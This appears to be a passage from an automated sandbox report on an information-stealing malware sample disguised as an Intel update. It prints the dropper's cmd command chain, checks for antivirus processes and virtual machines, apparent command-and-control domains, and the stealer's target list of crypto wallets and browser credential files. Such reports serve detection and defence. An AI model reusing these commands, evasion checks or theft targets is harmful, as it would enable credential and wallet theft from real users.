                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_13-104889
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comAPI coverage: 3.7 %
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com TID: 2144Thread sleep time: -180000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F7DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,13_2_00F7DC54
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F8A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00F8A087
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F8A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00F8A1E2
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F7E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,13_2_00F7E472
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F8A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,13_2_00F8A570
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F866DC FindFirstFileW,FindNextFileW,FindClose,13_2_00F866DC
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F4C622 FindFirstFileExW,13_2_00F4C622
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F873D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,13_2_00F873D4
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F87333 FindFirstFileW,FindClose,13_2_00F87333
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F7D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,13_2_00F7D921
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F15FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,13_2_00F15FC8
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
                Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP4
                Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: Hugo.com, 0000000D.00000003.2705913593.0000000004A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F8F4FF BlockInput,13_2_00F8F4FF
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F1338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,13_2_00F1338B
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F35058 mov eax, dword ptr fs:[00000030h]13_2_00F35058
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F720AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,13_2_00F720AA
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F42992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00F42992
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F30BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00F30BAF
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F30D45 SetUnhandledExceptionFilter,13_2_00F30D45
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F30F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00F30F91

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Hugo.com, 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: cloudewahsj.shop
                Source: Hugo.com, 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: rabidcowse.shop
                Source: Hugo.com, 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: noisycuttej.shop
                Source: Hugo.com, 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tirepublicerj.shop
                Source: Hugo.com, 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: framekgirus.shop
                Source: Hugo.com, 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: wholersorie.shop
                Source: Hugo.com, 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: abruptyopsn.shop
                Source: Hugo.com, 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: nearycrepso.shop
                Source: Hugo.com, 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: lastlossunbag.click
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F71B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,13_2_00F71B4D
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F1338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,13_2_00F1338B
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F7BBED SendInput,keybd_event,13_2_00F7BBED
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F7ECD0 mouse_event,13_2_00F7ECD0
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cloudy Cloudy.cmd & Cloudy.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 686536Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E JustifyJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Backing" Kelly Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 686536\Hugo.com + Ware + Sanyo + Pg + Folk + Lifetime + Robert + Enlarge + Hence 686536\Hugo.comJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Selection + ..\Suse + ..\Illustrations + ..\Alerts + ..\Smart + ..\Steps + ..\Lovers yJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com Hugo.com yJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F714AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,13_2_00F714AE
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F71FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,13_2_00F71FB0
                Source: Hugo.com, 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmp, Hugo.com, 0000000D.00000003.2657829422.0000000004D3C000.00000004.00000800.00020000.00000000.sdmp, Enlarge.9.dr, Hugo.com.2.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: Hugo.comBinary or memory string: Shell_TrayWnd
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F30A08 cpuid 13_2_00F30A08
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F6E5F4 GetLocalTime,13_2_00F6E5F4
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F6E652 GetUserNameW,13_2_00F6E652
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F4BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,13_2_00F4BCD2
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeCode function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Hugo.com, 0000000D.00000002.2765946345.0000000004959000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: Hugo.com PID: 6596, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Hugo.com, 0000000D.00000003.2695052302.0000000001B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wal
                Source: Hugo.com, 0000000D.00000003.2695052302.0000000001B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ctrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\OL^
                Source: Hugo.com, 0000000D.00000003.2695052302.0000000001B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520
                Source: Hugo.com, 0000000D.00000003.2695052302.0000000001B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wal
                Source: Hugo.com, 0000000D.00000003.2695052302.0000000001B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d
                Source: Hugo.com, 0000000D.00000003.2695052302.0000000001B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d
                Source: Hugo.com, 0000000D.00000003.2695052302.0000000001B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d
                Source: Hugo.com, 0000000D.00000003.2695052302.0000000001B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
